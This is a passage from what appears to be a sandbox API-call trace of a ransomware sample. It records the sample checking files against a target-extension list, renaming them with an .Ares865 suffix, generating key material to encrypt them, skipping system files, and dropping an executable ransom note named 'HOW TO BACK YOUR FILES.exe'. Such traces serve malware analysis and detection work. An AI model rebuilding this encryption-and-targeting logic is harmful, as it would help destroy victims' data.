-1 [0056.489] lstrlenW (lpString="dxl") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0056.489] lstrlenW (lpString="eco") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0056.489] lstrlenW (lpString="ecx") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0056.489] lstrlenW (lpString="edb") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0056.489] lstrlenW (lpString="epim") returned 4 [0056.489] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0056.489] lstrlenW (lpString="fcd") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0056.489] lstrlenW (lpString="fdb") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0056.489] lstrlenW (lpString="fic") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0056.489] lstrlenW (lpString="flexolibrary") returned 12 [0056.489] lstrlenW (lpString="fm5") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0056.489] lstrlenW (lpString="fmp") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0056.489] lstrlenW (lpString="fmp12") returned 5 [0056.489] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0056.489] lstrlenW (lpString="fmpsl") returned 5 [0056.489] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0056.489] lstrlenW (lpString="fol") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0056.490] lstrlenW (lpString="fp3") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0056.490] lstrlenW (lpString="fp4") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0056.490] lstrlenW (lpString="fp5") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0056.490] lstrlenW (lpString="fp7") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0056.490] lstrlenW (lpString="fpt") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0056.490] lstrlenW (lpString="frm") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0056.490] lstrlenW (lpString="gdb") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0056.490] lstrlenW (lpString="gdb") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0056.490] lstrlenW (lpString="grdb") returned 4 [0056.490] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0056.490] lstrlenW (lpString="gwi") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0056.490] lstrlenW (lpString="hdb") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0056.490] lstrlenW (lpString="his") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0056.490] lstrlenW (lpString="ib") returned 2 [0056.490] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0056.490] lstrlenW (lpString="idb") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0056.490] lstrlenW (lpString="ihx") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0056.490] lstrlenW (lpString="itdb") returned 4 [0056.490] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0056.490] lstrlenW (lpString="itw") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0056.490] lstrlenW (lpString="jet") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0056.490] lstrlenW (lpString="jtx") returned 3 [0056.490] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0056.491] lstrlenW (lpString="kdb") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0056.491] lstrlenW (lpString="kexi") returned 4 [0056.491] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0056.491] lstrlenW (lpString="kexic") returned 5 [0056.491] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0056.491] lstrlenW (lpString="kexis") returned 5 [0056.491] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0056.491] lstrlenW (lpString="lgc") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0056.491] lstrlenW (lpString="lwx") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0056.491] lstrlenW (lpString="maf") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0056.491] lstrlenW (lpString="maq") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0056.491] lstrlenW (lpString="mar") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0056.491] lstrlenW (lpString="marshal") returned 7 [0056.491] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0056.491] lstrlenW (lpString="mas") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0056.491] lstrlenW (lpString="mav") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0056.491] lstrlenW (lpString="maw") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0056.491] lstrlenW (lpString="mdbhtml") returned 7 [0056.491] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0056.491] lstrlenW (lpString="mdn") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0056.491] lstrlenW (lpString="mdt") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0056.491] lstrlenW (lpString="mfd") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0056.491] lstrlenW (lpString="mpd") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0056.491] lstrlenW (lpString="mrg") returned 3 [0056.491] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0056.492] lstrlenW (lpString="mud") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0056.492] lstrlenW (lpString="mwb") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0056.492] lstrlenW (lpString="myd") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0056.492] lstrlenW (lpString="ndf") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0056.492] lstrlenW (lpString="nnt") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0056.492] lstrlenW (lpString="nrmlib") returned 6 [0056.492] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0056.492] lstrlenW (lpString="ns2") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0056.492] lstrlenW (lpString="ns3") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0056.492] lstrlenW (lpString="ns4") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0056.492] lstrlenW (lpString="nsf") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0056.492] lstrlenW (lpString="nv") returned 2 [0056.492] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0056.492] lstrlenW (lpString="nv2") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0056.492] lstrlenW (lpString="nwdb") returned 4 [0056.492] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0056.492] lstrlenW (lpString="nyf") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0056.492] lstrlenW (lpString="odb") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0056.492] lstrlenW (lpString="odb") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0056.492] lstrlenW (lpString="oqy") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0056.492] lstrlenW (lpString="ora") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0056.492] lstrlenW (lpString="orx") returned 3 [0056.492] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0056.493] lstrlenW (lpString="owc") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0056.493] lstrlenW (lpString="p96") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0056.493] lstrlenW (lpString="p97") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0056.493] lstrlenW (lpString="pan") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0056.493] lstrlenW (lpString="pdb") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0056.493] lstrlenW (lpString="pdm") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0056.493] lstrlenW (lpString="pnz") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0056.493] lstrlenW (lpString="qry") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0056.493] lstrlenW (lpString="qvd") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0056.493] lstrlenW (lpString="rbf") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0056.493] lstrlenW (lpString="rctd") returned 4 [0056.493] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0056.493] lstrlenW (lpString="rod") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0056.493] lstrlenW (lpString="rodx") returned 4 [0056.493] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0056.493] lstrlenW (lpString="rpd") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0056.493] lstrlenW (lpString="rsd") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0056.493] lstrlenW (lpString="sas7bdat") returned 8 [0056.493] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0056.493] lstrlenW (lpString="sbf") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0056.493] lstrlenW (lpString="scx") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0056.493] lstrlenW (lpString="sdb") returned 3 [0056.493] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0056.494] lstrlenW (lpString="sdc") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0056.494] lstrlenW (lpString="sdf") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0056.494] lstrlenW (lpString="sis") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0056.494] lstrlenW (lpString="spq") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0056.494] lstrlenW (lpString="te") returned 2 [0056.494] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0056.494] lstrlenW (lpString="teacher") returned 7 [0056.494] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0056.494] lstrlenW (lpString="tmd") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0056.494] lstrlenW (lpString="tps") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0056.494] lstrlenW (lpString="trc") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0056.494] lstrlenW (lpString="trc") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0056.494] lstrlenW (lpString="trm") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0056.494] lstrlenW (lpString="udb") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0056.494] lstrlenW (lpString="udl") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0056.494] lstrlenW (lpString="usr") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0056.494] lstrlenW (lpString="v12") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0056.494] lstrlenW (lpString="vis") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0056.494] lstrlenW (lpString="vpd") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0056.494] lstrlenW (lpString="vvv") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0056.494] lstrlenW (lpString="wdb") returned 3 [0056.494] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0056.495] lstrlenW (lpString="wmdb") returned 4 [0056.495] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0056.495] lstrlenW (lpString="wrk") returned 3 [0056.495] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0056.495] lstrlenW (lpString="xdb") returned 3 [0056.495] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0056.495] lstrlenW (lpString="xld") returned 3 [0056.495] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0056.495] lstrlenW (lpString="xmlff") returned 5 [0056.495] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0056.495] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Downloads\\desktop.ini.Ares865") returned 45 [0056.495] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Downloads\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\downloads\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0056.495] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\downloads\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0056.496] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0056.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.496] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0056.497] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0056.497] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.497] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x164 [0056.517] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0056.521] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0056.522] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0056.522] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0056.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f30 [0056.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f30 | out: hHeap=0x2b0000) returned 1 [0056.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.523] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.523] CloseHandle (hObject=0x164) returned 1 [0056.523] CloseHandle (hObject=0x15c) returned 1 [0056.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.525] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49889440, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.525] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.525] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49889440, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0056.525] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0056.525] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0056.525] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0056.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0056.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0056.525] lstrlenW (lpString="C:\\Users\\Public\\Documents") returned 25 [0056.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0056.525] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.525] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.525] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0056.526] GetLastError () returned 0x0 [0056.526] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.526] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.526] CloseHandle (hObject=0x154) returned 1 [0056.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.526] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.526] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498af5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.526] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.526] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.526] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.526] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498af5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.526] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.526] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0056.526] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.526] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.526] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.526] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.526] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0056.526] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0056.526] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0056.526] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0056.526] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0056.527] lstrlenW (lpString="desktop.ini") returned 11 [0056.527] lstrlenW (lpString="C:\\Users\\Public\\Documents\\*") returned 27 [0056.527] lstrcpyW (in: lpString1=0x2cce434, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0056.527] lstrlenW (lpString="desktop.ini") returned 11 [0056.527] lstrlenW (lpString="Ares865") returned 7 [0056.527] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0056.527] lstrlenW (lpString=".dll") returned 4 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0056.527] lstrlenW (lpString=".lnk") returned 4 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0056.527] lstrlenW (lpString=".ini") returned 4 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0056.527] lstrlenW (lpString=".sys") returned 4 [0056.527] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0056.527] lstrlenW (lpString="desktop.ini") returned 11 [0056.527] lstrlenW (lpString="bak") returned 3 [0056.527] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0056.527] lstrlenW (lpString="ba_") returned 3 [0056.527] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0056.527] lstrlenW (lpString="dbb") returned 3 [0056.527] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0056.527] lstrlenW (lpString="vmdk") returned 4 [0056.527] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0056.527] lstrlenW (lpString="rar") returned 3 [0056.527] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0056.527] lstrlenW (lpString="zip") returned 3 [0056.527] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0056.527] lstrlenW (lpString="tgz") returned 3 [0056.527] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0056.527] lstrlenW (lpString="vbox") returned 4 [0056.528] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0056.528] lstrlenW (lpString="vdi") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0056.528] lstrlenW (lpString="vhd") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0056.528] lstrlenW (lpString="vhdx") returned 4 [0056.528] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0056.528] lstrlenW (lpString="avhd") returned 4 [0056.528] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0056.528] lstrlenW (lpString="db") returned 2 [0056.528] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0056.528] lstrlenW (lpString="db2") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0056.528] lstrlenW (lpString="db3") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0056.528] lstrlenW (lpString="dbf") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0056.528] lstrlenW (lpString="mdf") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0056.528] lstrlenW (lpString="mdb") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0056.528] lstrlenW (lpString="sql") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0056.528] lstrlenW (lpString="sqlite") returned 6 [0056.528] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0056.528] lstrlenW (lpString="sqlite3") returned 